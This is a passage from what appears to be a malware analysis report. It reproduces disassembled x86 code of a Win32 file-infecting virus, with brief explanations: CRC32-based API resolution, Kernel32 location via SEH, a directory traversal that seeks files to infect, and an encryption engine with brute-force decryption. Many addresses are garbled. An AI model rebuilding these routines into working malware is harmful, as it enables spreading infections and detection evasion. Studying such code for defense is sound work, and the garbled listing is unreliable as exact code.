24 CODE:004018E0 pusha CODE:004018E1 push eax CODE:004018E1 CODE:004018E2 CODE:004018E2 CODE:004018E2 cmp RandomNumberState, 0 CODE:004018E9 jnz CODE:004018E9 CODE:004018EB or RandomNumberState, 0FFFFFFFFh CODE:004018F2 call genrand_int32 CODE:004018F2 CODE:004018F7 pop ecx CODE:004018F8 xor edx, edx CODE:004018FA div ecx CODE:004018FC mov [esp+20h+var_4], edx CODE: and RandomNumberState, 0 CODE: popa CODE: retn CODE: CODE: RandomNumber endp The previous code block returns a random range within a range. CODE: GetAPIsFromCRC32List proc near CODE: CODE: CODE: var_28 = dword ptr -28h CODE: var_24 = dword ptr -24h CODE: PA_EAX = dword ptr -4 CODE: ARG1 = dword ptr 4 CODE: ARG2 = dword ptr 8 CODE: ARG3 = dword ptr 0Ch CODE: ARG4 = dword ptr 10h CODE: CODE: pusha CODE: A or dword ptr [ebp+14h], 0FFFFFFFFh CODE: E mov ebx, [esp+20h+arg4] CODE: mov esi, [ebx+3ch] CODE: add esi, ebx CODE: mov esi, [esi+78h] CODE: A lea esi, [ebx+esi+18h] CODE: E lodsd CODE: F xchg eax, ecx CODE: inc ecx CODE: lodsd CODE: add eax, ebx CODE: push eax CODE: lodsd CODE: lea edi, [ebx+eax] CODE: mov edi, [edi] CODE: B add edi, ebx CODE: D lodsd CODE: E add eax, ebx CODE: push eax CODE:

25 CODE: CODE: CODE: CODE: dec ecx CODE: jecxz short CODE: CODE: xchg esi, edi CODE: inc dword ptr [ebp+14h] CODE: call GetCRC32OfString CODE: CODE: E mov edi, esi CODE: mov esi, [esp+28h+arg1] CODE: or edx, 0FFFFFFFFh CODE: CODE: CODE: CODE: inc edx CODE: lodsd CODE: test eax, eax CODE: B jz short CODE: B CODE: D cmp eax, ebx CODE: F jnz short CODE: F CODE: mov esi, [esp+28h+var_28] CODE: mov ebx, [ebp+14h] CODE: movzx ebx, word ptr [esi+ebx*2] CODE: B mov esi, [esp+28h+var_24] CODE: F mov ebx, [esi+ebx*4] CODE: add ebx, [esp+28h+arg4] CODE: mov eax, [esp+28h+arg2] CODE: A lea eax, [eax+edx*4] CODE: D mov [eax], ebx CODE: F jmp short CODE: F CODE: CODE: CODE: CODE: mov esi, [esp+28h+arg2] CODE: mov ecx, [esp+28h+arg3] CODE: CODE: CODE: CODE: lodsd CODE: A test eax, eax CODE: C jz short CODE: C CODE: E loop CODE: E CODE: CODE: CODE: add esp, 8 CODE: mov [esp+20h+pa_eax], eax CODE: popa CODE: retn 10h CODE: CODE: GetAPIsFromCRC32List endp

26 The previous code block retrieves pointers to several API s. The function will take require the pointer to the CRC32 list, pointer to a buffer where the API addresses will be saved, the number of imported API s and the Base Address. CODE: B GetCRC32OfString proc near CODE: B CODE: B push eax CODE: C push ecx CODE: D push edx CODE: E push edi CODE: F cld CODE: xor ecx, ecx CODE: dec ecx CODE: mov edx, ecx CODE: CODE: CODE: cmp byte ptr [esi], 0 CODE: jz CODE: CODE: A xor eax, eax CODE: C xor ebx, ebx CODE: E lodsb CODE: F xor al, cl CODE:004019A1 mov cl, ch CODE:004019A3 mov ch, dl CODE:004019A5 mov dl, dh CODE:004019A7 mov dh, 8 CODE:004019A7 CODE:004019A9 CODE:004019A9 shr bx, 1 CODE:004019AC rcr ax, 1 CODE:004019AF jnb CODE:004019AF CODE:004019B1 xor ax, 8320h CODE:004019B5 xor bx, 0EDB8h CODE:004019B5 CODE:004019BA CODE:004019BA dec dh CODE:004019BC jnz CODE:004019BC CODE:004019BE xor ecx, eax CODE:004019C0 xor edx, ebx CODE:004019C2 dec edi CODE:004019C3 jnz CODE:004019C3 CODE:004019C5 CODE:004019C5 not edx CODE:004019C7 not ecx CODE:004019C9 mov eax, edx

27 CODE:004019CB rol eax, 10h CODE:004019CE mov ax, cx CODE:004019D1 inc esi CODE:004019D2 xchg eax, ebx CODE:004019D3 pop edi CODE:004019D4 pop edx CODE:004019D5 pop ecx CODE:004019D6 pop eax CODE:004019D7 retn CODE:004019D7 CODE:004019D7 GetCRC32OfString endp The previous code block calculates the CRC32 of zero terminated string. The function expects a pointer to the ASCII string in ESI register. CODE:004019D8 GetKernel32Base proc near CODE:004019D8 push eax CODE:004019D9 push esi CODE:004019DA xor esi, esi CODE:004019DC mov esi, fs:[esi] CODE:004019DC CODE:004019DF CODE:004019DF mov eax, [esi] CODE:004019E1 inc eax CODE:004019E2 jz CODE:004019E2 CODE:004019E4 dec eax CODE:004019E5 xchg eax, esi CODE:004019E6 jmp CODE:004019E6 CODE:004019E8 CODE:004019E8 CODE:004019E8 mov eax, [esi+4] CODE:004019EB xor ax, ax CODE:004019EB CODE:004019EE CODE:004019EE cmp word ptr [eax], 5A4Dh CODE:004019F3 jz CODE:004019F3 CODE:004019F5 CODE:004019F5 sub eax, 10000h CODE:004019FA jmp CODE:004019FA CODE:004019FC CODE:004019FC CODE:004019FC mov [ebp+0], eax CODE:004019FF mov esi, [eax+3ch] CODE:00401A02 add esi, eax CODE:00401A04 cmp dword ptr [esi], 4550h CODE:00401A0A jnz

28 CODE:00401A0A CODE:00401A0C pop esi CODE:00401A0D pop eax CODE:00401A0E retn CODE:00401A0E CODE:00401A0E GetKernel32Base endp The previous code retrieves the Kernel32 location in memory. The function retrieves the Kernel32 location using SEH. CODE:00401A0F DirectoryTraversal proc near CODE:00401A0F CODE:00401A0F var_17c = dword ptr -17Ch CODE:00401A0F var_170 = dword ptr -170h CODE:00401A0F var_144 = dword ptr -144h CODE:00401A0F var_40 = dword ptr -40h CODE:00401A0F CODE:00401A0F pusha CODE:00401A10 push 0 CODE:00401A12 lea eax, DIR_Root+2 CODE:00401A18 push eax CODE:00401A19 mov al, 0Ch CODE:00401A1B call StealthAPI CODE:00401A1B CODE:00401A20 test eax, eax CODE:00401A22 CODE:00401A22 CODE:00401A28 CODE:00401A28 sub esp, 140h CODE:00401A2E push esp CODE:00401A2F lea eax, DIR_Wildcards CODE:00401A35 push eax CODE:00401A36 mov al, 16h CODE:00401A38 call StealthAPI CODE:00401A38 CODE:00401A3D push eax CODE:00401A3E inc eax CODE:00401A3F CODE:00401A3F CODE:00401A45 dec eax CODE:00401A45 CODE:00401A46 CODE:00401A46 lea ebx, [esp+174h+var_144] CODE:00401A4A test byte ptr [esp+174h+var_170], 10h CODE:00401A4F jz CODE:00401A4F CODE:00401A51 cmp byte ptr [ebx], '.' CODE:00401A54 jz CODE:00401A54 CODE:00401A56 push ebx CODE:00401A57 mov al, 0Ch CODE:00401A59 call StealthAPI CODE:00401A59

29 CODE:00401A5E jmp short CODE:00401A5E CODE:00401A60 ; CODE:00401A60 CODE:00401A60 lea esi, [esp+174h+var_170] CODE:00401A64 lea edi, [ebp+13ch] CODE:00401A6A mov ecx, 140h CODE:00401A6F rep movsb CODE:00401A71 push eax CODE:00401A72 lea esi, [ebp+168h] CODE:00401A78 call Uppercase CODE:00401A78 CODE:00401A7D call GetCRC32OfString CODE:00401A7D CODE:00401A82 lea esi, CRC32_Checksumfile_List CODE:00401A82 CODE:00401A88 CODE:00401A88 lodsd CODE:00401A89 xchg eax, ecx CODE:00401A8A jecxz CODE:00401A8A CODE:00401A8C cmp ebx, ecx CODE:00401A8E jnz CODE:00401A8E CODE:00401A90 lea esi, [ebp+168h] CODE:00401A96 push esi CODE:00401A97 push 80h CODE:00401A9C push esi CODE:00401A9D mov al, 11h CODE:00401A9F call StealthAPI CODE:00401A9F CODE:00401AA4 mov al, 15h CODE:00401AA6 call StealthAPI CODE:00401AA6 CODE:00401AAB pop eax CODE:00401AAC jmp CODE:00401AAC CODE:00401AAE CODE:00401AAE CODE:00401AAE pop eax CODE:00401AAF or dword ptr [ebp+280h], 0FFFFFFFFh CODE:00401AB6 call InfectFile CODE:00401AB6 CODE:00401ABB inc dword ptr [ebp+280h] CODE:00401AC1 jz CODE:00401AC1 CODE:00401AC3 dec dword ptr [ebp+27ch] CODE:00401AC9 jz CODE:00401AC9 CODE:00401ACB CODE:00401ACB CODE:00401ACB lea ebx, [esp+174h+var_170]

30 CODE:00401ACF push ebx CODE:00401AD0 push eax CODE:00401AD1 mov al, 17h CODE:00401AD3 call StealthAPI CODE:00401AD3 CODE:00401AD8 cmp ThreadExecution, 0FFFFFFFFh CODE:00401ADF jz short CODE:00401ADF CODE:00401AE1 test eax, eax CODE:00401AE3 mov eax, [esp+17ch+var_17c] CODE:00401AE6 jnz CODE:00401AE6 CODE:00401AEC CODE:00401AEC CODE:00401AEC push eax CODE:00401AED mov al, 18h CODE:00401AEF call StealthAPI CODE:00401AEF CODE:00401AF4 lea eax, DIR_Parent CODE:00401AFA push eax CODE:00401AFB mov al, 0Ch CODE:00401AFD call StealthAPI CODE:00401AFD CODE:00401B02 add esp, 144h CODE:00401B08 mov eax, [esp+40h+var_40] CODE:00401B0B test eax, eax CODE:00401B0D jnz short CODE:00401B0D CODE:00401B0F CODE:00401B0F CODE:00401B0F CODE:00401B0F add esp, 4 CODE:00401B12 popa CODE:00401B13 retn CODE:00401B13 CODE:00401B14 CODE:00401B14 CODE:00401B14 CODE:00401B14 mov esi, esp CODE:00401B16 lodsd CODE:00401B17 test eax, eax CODE:00401B19 jz CODE:00401B19 CODE:00401B1B mov al, 18h CODE:00401B1D call StealthAPI CODE:00401B1D CODE:00401B22 add esp, 140h CODE:00401B28 jmp CODE:00401B28 CODE:00401B28 DirectoryTraversal endp The previous code block traverses the directories looking for files to infect. CODE:00401B2A init_genrand proc near

31 CODE:00401B2A CODE:00401B2A ARG1 = dword ptr 4 CODE:00401B2A CODE:00401B2A pusha CODE:00401B2B lea edi, [ebp+304h] CODE:00401B31 xor ecx, ecx CODE:00401B33 mov eax, [esp+20h+arg1] CODE:00401B37 stosd CODE:00401B37 CODE:00401B38 CODE:00401B38 inc ecx CODE:00401B39 cmp ecx, 270h CODE:00401B3F jz CODE:00401B3F CODE:00401B41 mov edx, eax CODE:00401B43 shr edx, 1Eh CODE:00401B46 xor eax, edx CODE:00401B48 imul eax, 6C078965h CODE:00401B4E add eax, ecx CODE:00401B50 stosd CODE:00401B51 jmp CODE:00401B51 CODE:00401B53 CODE:00401B53 CODE:00401B53 mov [ebp+300h], ecx CODE:00401B59 popa CODE:00401B5A retn 4 CODE:00401B5A CODE:00401B5A init_genrand endp The previous code block initializes an array with a 32 bit seed. CODE:00401B5D init_by_array proc near CODE:00401B5D CODE:00401B5D var_24 = dword ptr -24h CODE:00401B5D arg_0 = dword ptr 4 CODE:00401B5D arg_4 = dword ptr 8 CODE:00401B5D CODE:00401B5D pusha CODE:00401B5E lea edi, [ebp+304h] CODE:00401B64 mov esi, [esp+20h+arg_0] CODE:00401B68 xor edx, edx CODE:00401B6A push edx CODE:00401B6B inc edx CODE:00401B6C mov eax, [esp+24h+arg_4] CODE:00401B70 mov ecx, 270h CODE:00401B75 cmp eax, ecx CODE:00401B77 jl CODE:00401B77 CODE:00401B79 mov ecx, eax CODE:00401B79 CODE:00401B7B

32 CODE:00401B7B push 12BD6AAh CODE:00401B80 call init_genrand CODE:00401B80 CODE:00401B85 CODE:00401B85 CODE:00401B85 mov eax, [edi+edx*4-4] CODE:00401B89 mov ebx, eax CODE:00401B8B shr eax, 1Eh CODE:00401B8E xor eax, ebx CODE:00401B90 imul eax, 19660Dh CODE:00401B96 xor eax, [edi+edx*4] CODE:00401B99 mov ebx, [esp+24h+var_24] CODE:00401B9C add eax, ebx CODE:00401B9E add eax, [esi+ebx*4] CODE:00401BA1 mov [edi+edx*4], eax CODE:00401BA4 inc edx CODE:00401BA5 inc [esp+24h+var_24] CODE:00401BA8 cmp edx, 270h CODE:00401BAE jl short CODE:00401BAE CODE:00401BB0 mov eax, [edi+edx*4-4] CODE:00401BB4 mov [edi], eax CODE:00401BB6 xor edx, edx CODE:00401BB8 inc edx CODE:00401BB8 CODE:00401BB9 CODE:00401BB9 CODE:00401BB9 mov ebx, [esp+24h+var_24] CODE:00401BBC cmp ebx, [esp+24h+arg_4] CODE:00401BC0 jl short CODE:00401BC0 CODE:00401BC2 and [esp+24h+var_24], 0 CODE:00401BC2 CODE:00401BC6 CODE:00401BC6 CODE:00401BC6 CODE:00401BC8 mov ecx, 26Fh CODE:00401BC8 CODE:00401BCD CODE:00401BCD mov eax, [edi+edx*4-4] CODE:00401BD1 mov ebx, eax CODE:00401BD3 shr eax, 1Eh CODE:00401BD6 xor eax, ebx CODE:00401BD8 imul eax, 5D588B65h CODE:00401BDE xor eax, [edi+edx*4] CODE:00401BE1 sub eax, edx CODE:00401BE3 mov [edi+edx*4], eax CODE:00401BE6 inc edx CODE:00401BE7 mov eax, 270h CODE:00401BEC cmp edx, eax CODE:00401BEE jl CODE:00401BEE CODE:00401BF0 mov eax, [edi+eax*4-4] CODE:00401BF4 mov [edi], eax CODE:00401BF6 xor edx, edx

33 CODE:00401BF8 inc edx CODE:00401BF8 CODE:00401BF9 CODE:00401BF9 CODE:00401BF9 loop CODE:00401BF9 CODE:00401BFB mov dword ptr [edi], h CODE:00401C01 pop eax CODE:00401C02 popa CODE:00401C03 retn 8 CODE:00401C03 CODE:00401C03 init_by_array endp The previous code block initializes an array with an array of 32 bit seeds. CODE:00401C06 genrand_int32 proc near CODE:00401C06 CODE:00401C06 lea edi, [ebp+304h] CODE:00401C0C lea esi, mag01 CODE:00401C12 mov edx, [ebp+300h] CODE:00401C18 cmp edx, 270h CODE:00401C1E jl CODE:00401C1E CODE:00401C20 xor ecx, ecx CODE:00401C20 CODE:00401C22 CODE:00401C22 cmp ecx, 0E3h CODE:00401C28 jz CODE:00401C28 CODE:00401C2A call proc00401cb4 CODE:00401C2A CODE:00401C2F xor eax, [edi+ecx*4+634h] CODE:00401C36 mov [edi+ecx*4], eax CODE:00401C39 inc ecx CODE:00401C3A jmp CODE:00401C3A CODE:00401C3C CODE:00401C3C CODE:00401C3C CODE:00401C3C cmp ecx, 26Fh CODE:00401C42 jz CODE:00401C42 CODE:00401C44 call proc00401cb4 CODE:00401C44 CODE:00401C49 xor eax, [edi+ecx*4-38ch] CODE:00401C50 mov [edi+ecx*4], eax CODE:00401C53 inc ecx CODE:00401C54 jmp CODE:00401C54 CODE:00401C56 CODE:00401C56 CODE:00401C56 mov eax, [edi]

34 CODE:00401C58 and eax, 7FFFFFFFh CODE:00401C5D mov ebx, [edi+9bch] CODE:00401C63 call sub_401cc0 CODE:00401C63 CODE:00401C68 xor eax, [edi+630h] CODE:00401C6E mov [edi+9bch], eax CODE:00401C74 and dword ptr [ebp+300h], 0 CODE:00401C74 CODE:00401C7B CODE:00401C7B mov ecx, [ebp+300h] CODE:00401C81 mov ebx, [edi+ecx*4] CODE:00401C84 inc dword ptr [ebp+300h] CODE:00401C8A mov edx, ebx CODE:00401C8C shr edx, 0Bh CODE:00401C8F xor ebx, edx CODE:00401C91 mov edx, ebx CODE:00401C93 shl edx, 7 CODE:00401C96 and edx, 9D2C5680h CODE:00401C9C xor ebx, edx CODE:00401C9E mov edx, ebx CODE:00401CA0 shl edx, 0Fh CODE:00401CA3 and edx, 0EFC60000h CODE:00401CA9 xor ebx, edx CODE:00401CAB mov edx, ebx CODE:00401CAD shr edx, 12h CODE:00401CB0 xor ebx, edx CODE:00401CB2 xchg eax, ebx CODE:00401CB3 retn CODE:00401CB3 CODE:00401CB3 genrand_int32 endp The previous code block generates a random number in the interval [0, 0ffffffffh]. CODE:00401D5B RDKE32Encrypt proc near CODE:00401D5B CODE:00401D5B arg_0 = dword ptr 4 CODE:00401D5B arg_4 = dword ptr 8 CODE:00401D5B arg_8 = dword ptr 0Ch CODE:00401D5B arg_c = dword ptr 10h CODE:00401D5B CODE:00401D5B pusha CODE:00401D5C mov edi, [esp+20h+arg_0] CODE:00401D60 mov ebx, [esp+20h+arg_4] CODE:00401D64 mov ecx, [esp+20h+arg_8] CODE:00401D68 mov eax, [esp+20h+arg_c] CODE:00401D6C push ebx CODE:00401D6D push ecx CODE:00401D6E push edi CODE:00401D6F call SHA1 CODE:00401D6F CODE:00401D74 call RandomNumber CODE:00401D74 CODE:00401D79 inc eax CODE:00401D7A xchg eax, edx

35 CODE:00401D7B call cryptor CODE:00401D7B CODE:00401D80 popa CODE:00401D81 retn 10h CODE:00401D81 CODE:00401D81 RDKE32Encrypt endp The previous code block is the random decoding key engine encryptor for the virus. CODE:00401D84 RDKE32Decrypt proc near CODE:00401D84 CODE:00401D84 arg_0 = dword ptr 4 CODE:00401D84 arg_4 = dword ptr 8 CODE:00401D84 arg_8 = dword ptr 0Ch CODE:00401D84 CODE:00401D84 pusha CODE:00401D85 mov edi, [esp+20h+arg_0] CODE:00401D89 mov ebx, [esp+20h+arg_4] CODE:00401D8D mov ecx, [esp+20h+arg_8] CODE:00401D91 sub esp, 14h CODE:00401D94 mov esi, esp CODE:00401D96 xor edx, edx CODE:00401D96 CODE:00401D98 CODE:00401D98 bruteforce_loop: CODE:00401D98 inc edx CODE:00401D99 call cryptor CODE:00401D99 CODE:00401D9E push ebx CODE:00401D9F push ecx CODE:00401DA0 push esi CODE:00401DA1 call SHA1 CODE:00401DA1 CODE:00401DA6 pusha CODE:00401DA7 push 5 CODE:00401DA9 pop ecx CODE:00401DAA repe cmpsd CODE:00401DAC popa CODE:00401DAD jz short RDKE32Decrypt_exit CODE:00401DAD CODE:00401DAF call cryptor CODE:00401DAF CODE:00401DB4 cmp ThreadExecution, 0FFFFFFFFh CODE:00401DBB jz short RDKE32Decrypt_exit CODE:00401DBB CODE:00401DBD jmp short bruteforce_loop CODE:00401DBD CODE:00401DBF CODE:00401DBF CODE:00401DBF RDKE32Decrypt_exit: CODE:00401DBF CODE:00401DBF add esp, 14h CODE:00401DC2 popa CODE:00401DC3 retn 0Ch CODE:00401DC3

36 CODE:00401DC3 RDKE32Decrypt endp The previous code block is the random decoding key engine decryptor for the virus. CODE:00401DD7 cryptor proc near CODE:00401DD7 CODE:00401DD7 pusha CODE:00401DD7 CODE:00401DD8 CODE:00401DD8 crypt_loop: CODE:00401DD8 test dl, dl CODE:00401DDA jz short dont_crypt CODE:00401DDA CODE:00401DDC xor [ebx], dl CODE:00401DDE inc ebx CODE:00401DDE CODE:00401DDF CODE:00401DDF dont_crypt: CODE:00401DDF rol edx, 8 CODE:00401DE2 loop crypt_loop CODE:00401DE2 CODE:00401DE4 popa CODE:00401DE5 retn CODE:00401DE5 CODE:00401DE5 cryptor endp The previous code block is a 32 bit encryptor and the decryptor for the engine. CODE:00401DF0 SHA1 CODE:00401DF0 CODE:00401DF0 CODE:00401DF0 _temp_buffer CODE:00401DF0 var_4dc CODE:00401DF0 var_4d8 CODE:00401DF0 var_4d4 CODE:00401DF0 var_4d0 CODE:00401DF0 var_4cc CODE:00401DF0 var_4c8 CODE:00401DF0 var_4c4 CODE:00401DF0 var_4c0 CODE:00401DF0 var_4bc CODE:00401DF0 var_4b8 CODE:00401DF0 var_4b4 CODE:00401DF0 var_4b0 CODE:00401DF0 var_4ac CODE:00401DF0 var_4a8 CODE:00401DF0 var_4a4 CODE:00401DF0 var_2e0 CODE:00401DF0 var_2dc CODE:00401DF0 var_2d8 CODE:00401DF0 var_2d4 CODE:00401DF0 var_2d0 CODE:00401DF0 var_2cc CODE:00401DF0 _size proc near = dword ptr -4E0h = dword ptr -4DCh = dword ptr -4D8h = dword ptr -4D4h = dword ptr -4D0h = dword ptr -4CCh = dword ptr -4C8h = dword ptr -4C4h = dword ptr -4C0h = dword ptr -4BCh = dword ptr -4B8h = dword ptr -4B4h = dword ptr -4B0h = dword ptr -4ACh = dword ptr -4A8h = dword ptr -4A4h = dword ptr -2E0h = dword ptr -2DCh = dword ptr -2D8h = dword ptr -2D4h = dword ptr -2D0h = dword ptr -2CCh = dword ptr -28Ch

37 CODE:00401DF0 _count = dword ptr -288h CODE:00401DF0 _flag = dword ptr -284h CODE:00401DF0 arg_0 = dword ptr 4 CODE:00401DF0 arg_4 = dword ptr 8 CODE:00401DF0 arg_8 = dword ptr 0Ch CODE:00401DF0 CODE:00401DF0 pusha CODE:00401DF1 sub esp, 260h CODE:00401DF7 cld CODE:00401DF8 mov ecx, [esp+280h+arg_4] CODE:00401DFF mov esi, [esp+280h+arg_8] CODE:00401E06 mov [esp+280h+_size], ecx CODE:00401E0A or [esp+280h+_flag], 0FFFFFFFFh CODE:00401E0F mov [esp+280h+_count], ecx CODE:00401E13 mov [esp+280h+var_2dc], h CODE:00401E1B mov [esp+280h+var_2d8], 0EFCDAB89h CODE:00401E23 mov [esp+280h+var_2d4], 98BADCFEh CODE:00401E2B mov [esp+280h+var_2d0], h CODE:00401E33 mov [esp+280h+var_2cc], 0C3D2E1F0h CODE:00401E33 CODE:00401E3B CODE:00401E3B SHA1_Loop: CODE:00401E3B CODE:00401E3B cmp [esp+280h+_count], 40h CODE:00401E40 jb SHA1_LIPOF CODE:00401E40 CODE:00401E46 mov edi, [esp+280h+var_2dc] CODE:00401E4A mov ebx, [esp+280h+var_2d8] CODE:00401E4E mov ecx, [esp+280h+var_2d4] CODE:00401E52 mov edx, [esp+280h+var_2d0] CODE:00401E56 mov ebp, [esp+280h+var_2cc] CODE:00401E5A mov [esp+280h+var_2e0], edi CODE:00401E5E lodsd CODE:00401E5F rol [esp+280h+var_2e0], 5 CODE:00401E64 bswap eax CODE:00401E66 add ebp, [esp+280h+var_2e0] CODE:00401E6A mov [esp+280h+_temp_buffer], eax CODE:00401E71 mov [esp+280h+var_2e0], ecx CODE:00401E75 xor [esp+280h+var_2e0], edx CODE:00401E79 add ebp, eax CODE:00401E7B and [esp+280h+var_2e0], ebx CODE:00401E7F xor [esp+280h+var_2e0], edx CODE:00401E83 ror ebx, 2 CODE:00401E86 lea ebp, [ebp+5a827999h] CODE:00401E8C add ebp, [esp+280h+var_2e0] CODE:00401E90 mov [esp+280h+var_2e0], ebp CODE:00401E94 lodsd CODE:00401E95 rol [esp+280h+var_2e0], 5 CODE:00401E9A bswap eax CODE:00401E9C add edx, [esp+280h+var_2e0] CODE:00401EA0 mov [esp+280h+var_4dc], eax CODE:00401EA7 mov [esp+280h+var_2e0], ebx CODE:00401EAB xor [esp+280h+var_2e0], ecx CODE:00401EAF add edx, eax CODE:00401EB1 and [esp+280h+var_2e0], edi CODE:00401EB5 xor [esp+280h+var_2e0], ecx CODE:00401EB9 ror edi, 2

38 CODE:00401EBC lea edx, [edx+5a827999h] CODE:00401EC2 add edx, [esp+280h+var_2e0] CODE:00401EC6 mov [esp+280h+var_2e0], edx CODE:00401ECA lodsd CODE:00401ECB rol [esp+280h+var_2e0], 5 CODE:00401ED0 bswap eax CODE:00401ED2 add ecx, [esp+280h+var_2e0] CODE:00401ED6 mov [esp+280h+var_4d8], eax CODE:00401EDD mov [esp+280h+var_2e0], edi CODE:00401EE1 xor [esp+280h+var_2e0], ebx CODE:00401EE5 add ecx, eax CODE:00401EE7 and [esp+280h+var_2e0], ebp CODE:00401EEB xor [esp+280h+var_2e0], ebx CODE:00401EEF ror ebp, 2 CODE:00401EF2 lea ecx, [ecx+5a827999h] CODE:00401EF8 add ecx, [esp+280h+var_2e0] CODE:00401EFC mov [esp+280h+var_2e0], ecx CODE:00401F00 lodsd CODE:00401F01 rol [esp+280h+var_2e0], 5 CODE:00401F06 bswap eax CODE:00401F08 add ebx, [esp+280h+var_2e0] CODE:00401F0C mov [esp+280h+var_4d4], eax CODE:00401F13 mov [esp+280h+var_2e0], ebp CODE:00401F17 xor [esp+280h+var_2e0], edi CODE:00401F1B add ebx, eax CODE:00401F1D and [esp+280h+var_2e0], edx CODE:00401F21 xor [esp+280h+var_2e0], edi CODE:00401F25 ror edx, 2 CODE:00401F28 lea ebx, [ebx+5a827999h] CODE:00401F2E add ebx, [esp+280h+var_2e0] CODE:00401F32 mov [esp+280h+var_2e0], ebx CODE:00401F36 lodsd CODE:00401F37 rol [esp+280h+var_2e0], 5 CODE:00401F3C bswap eax CODE:00401F3E add edi, [esp+280h+var_2e0] CODE:00401F42 mov [esp+280h+var_4d0], eax CODE:00401F49 mov [esp+280h+var_2e0], edx CODE:00401F4D xor [esp+280h+var_2e0], ebp CODE:00401F51 add edi, eax CODE:00401F53 and [esp+280h+var_2e0], ecx CODE:00401F57 xor [esp+280h+var_2e0], ebp CODE:00401F5B ror ecx, 2 CODE:00401F5E lea edi, [edi+5a827999h] CODE:00401F64 add edi, [esp+280h+var_2e0] CODE:00401F68 mov [esp+280h+var_2e0], edi CODE:00401F6C lodsd CODE:00401F6D rol [esp+280h+var_2e0], 5 CODE:00401F72 bswap eax CODE:00401F74 add ebp, [esp+280h+var_2e0] CODE:00401F78 mov [esp+280h+var_4cc], eax CODE:00401F7F mov [esp+280h+var_2e0], ecx CODE:00401F83 xor [esp+280h+var_2e0], edx CODE:00401F87 add ebp, eax CODE:00401F89 and [esp+280h+var_2e0], ebx CODE:00401F8D xor [esp+280h+var_2e0], edx CODE:00401F91 ror ebx, 2 CODE:00401F94 lea ebp, [ebp+5a827999h]

39 CODE:00401F9A add ebp, [esp+280h+var_2e0] CODE:00401F9E mov [esp+280h+var_2e0], ebp CODE:00401FA2 lodsd CODE:00401FA3 rol [esp+280h+var_2e0], 5 CODE:00401FA8 bswap eax CODE:00401FAA add edx, [esp+280h+var_2e0] CODE:00401FAE mov [esp+280h+var_4c8], eax CODE:00401FB5 mov [esp+280h+var_2e0], ebx CODE:00401FB9 xor [esp+280h+var_2e0], ecx CODE:00401FBD add edx, eax CODE:00401FBF and [esp+280h+var_2e0], edi CODE:00401FC3 xor [esp+280h+var_2e0], ecx CODE:00401FC7 ror edi, 2 CODE:00401FCA lea edx, [edx+5a827999h] CODE:00401FD0 add edx, [esp+280h+var_2e0] CODE:00401FD4 mov [esp+280h+var_2e0], edx CODE:00401FD8 lodsd CODE:00401FD9 rol [esp+280h+var_2e0], 5 CODE:00401FDE bswap eax CODE:00401FE0 add ecx, [esp+280h+var_2e0] CODE:00401FE4 mov [esp+280h+var_4c4], eax CODE:00401FEB mov [esp+280h+var_2e0], edi CODE:00401FEF xor [esp+280h+var_2e0], ebx CODE:00401FF3 add ecx, eax CODE:00401FF5 and [esp+280h+var_2e0], ebp CODE:00401FF9 xor [esp+280h+var_2e0], ebx CODE:00401FFD ror ebp, 2 CODE: lea ecx, [ecx+5a827999h] CODE: add ecx, [esp+280h+var_2e0] CODE: A mov [esp+280h+var_2e0], ecx CODE: E lodsd CODE: F rol [esp+280h+var_2e0], 5 CODE: bswap eax CODE: add ebx, [esp+280h+var_2e0] CODE: A mov [esp+280h+var_4c0], eax CODE: mov [esp+280h+var_2e0], ebp CODE: xor [esp+280h+var_2e0], edi CODE: add ebx, eax CODE: B and [esp+280h+var_2e0], edx CODE: F xor [esp+280h+var_2e0], edi CODE: ror edx, 2 CODE: lea ebx, [ebx+5a827999h] CODE: C add ebx, [esp+280h+var_2e0] CODE: mov [esp+280h+var_2e0], ebx CODE: lodsd CODE: rol [esp+280h+var_2e0], 5 CODE: A bswap eax CODE: C add edi, [esp+280h+var_2e0] CODE: mov [esp+280h+var_4bc], eax CODE: mov [esp+280h+var_2e0], edx CODE: B xor [esp+280h+var_2e0], ebp CODE: F add edi, eax CODE: and [esp+280h+var_2e0], ecx CODE: xor [esp+280h+var_2e0], ebp CODE: ror ecx, 2 CODE: C lea edi, [edi+5a827999h] CODE: add edi, [esp+280h+var_2e0]

40 CODE: mov [esp+280h+var_2e0], edi CODE: A lodsd CODE: B rol [esp+280h+var_2e0], 5 CODE: bswap eax CODE: add ebp, [esp+280h+var_2e0] CODE: mov [esp+280h+var_4b8], eax CODE: D mov [esp+280h+var_2e0], ecx CODE: xor [esp+280h+var_2e0], edx CODE: add ebp, eax CODE: and [esp+280h+var_2e0], ebx CODE: B xor [esp+280h+var_2e0], edx CODE: F ror ebx, 2 CODE:004020A2 lea ebp, [ebp+5a827999h] CODE:004020A8 add ebp, [esp+280h+var_2e0] CODE:004020AC mov [esp+280h+var_2e0], ebp CODE:004020B0 lodsd CODE:004020B1 rol [esp+280h+var_2e0], 5 CODE:004020B6 bswap eax CODE:004020B8 add edx, [esp+280h+var_2e0] CODE:004020BC mov [esp+280h+var_4b4], eax CODE:004020C3 mov [esp+280h+var_2e0], ebx CODE:004020C7 xor [esp+280h+var_2e0], ecx CODE:004020CB add edx, eax CODE:004020CD and [esp+280h+var_2e0], edi CODE:004020D1 xor [esp+280h+var_2e0], ecx CODE:004020D5 ror edi, 2 CODE:004020D8 lea edx, [edx+5a827999h] CODE:004020DE add edx, [esp+280h+var_2e0] CODE:004020E2 mov [esp+280h+var_2e0], edx CODE:004020E6 lodsd CODE:004020E7 rol [esp+280h+var_2e0], 5 CODE:004020EC bswap eax CODE:004020EE add ecx, [esp+280h+var_2e0] CODE:004020F2 mov [esp+280h+var_4b0], eax CODE:004020F9 mov [esp+280h+var_2e0], edi CODE:004020FD xor [esp+280h+var_2e0], ebx CODE: add ecx, eax CODE: and [esp+280h+var_2e0], ebp CODE: xor [esp+280h+var_2e0], ebx CODE: B ror ebp, 2 CODE: E lea ecx, [ecx+5a827999h] CODE: add ecx, [esp+280h+var_2e0] CODE: mov [esp+280h+var_2e0], ecx CODE: C lodsd CODE: D rol [esp+280h+var_2e0], 5 CODE: bswap eax CODE: add ebx, [esp+280h+var_2e0] CODE: mov [esp+280h+var_4ac], eax CODE: F mov [esp+280h+var_2e0], ebp CODE: xor [esp+280h+var_2e0], edi CODE: add ebx, eax CODE: and [esp+280h+var_2e0], edx CODE: D xor [esp+280h+var_2e0], edi CODE: ror edx, 2 CODE: lea ebx, [ebx+5a827999h] CODE: A add ebx, [esp+280h+var_2e0] CODE: E mov [esp+280h+var_2e0], ebx

